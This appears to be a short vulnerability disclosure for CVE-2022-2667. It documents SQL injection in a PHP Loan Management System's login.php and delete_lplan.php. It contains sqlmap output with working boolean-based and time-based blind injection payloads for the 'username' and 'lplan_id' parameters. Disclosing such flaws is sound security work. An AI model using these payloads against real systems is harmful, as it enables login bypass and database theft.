CVE-2022-2667: GitHub - cxaqhq/Loan-Management-System-Sqlinjection

Loan-Management-System-Sqlinjection****Sqlinjection 1****Sqlinjection Page

login.php

Sqlmap

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: username=1' OR NOT 8877=8877#&password=1&login=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=1' AND (SELECT 4254 FROM (SELECT(SLEEP(5)))Ydjq)-- NMhF&password=1&login=1
---
[21:25:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.6.9
back-end DBMS: MySQL >= 5.0.12

Code

The bind_param binding parameter is not used

Sqlinjection 2 ( too many )****Sqlinjection Page

delete_lplan.php

Sqlmap

GET parameter 'lplan_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 1899 HTTP(s) requests:
---
Parameter: lplan_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: lplan_id=2'+(SELECT 0x714c6c4c WHERE 6948=6948 AND (SELECT 7588 FROM (SELECT(SLEEP(5)))BFGS))+'
---
[21:51:10] [INFO] the back-end DBMS is MySQL
[21:51:10] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[21:51:10] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
web application technology: PHP 5.6.9, Apache 2.4.39
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

Code

A lot of

Code Downalod

https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html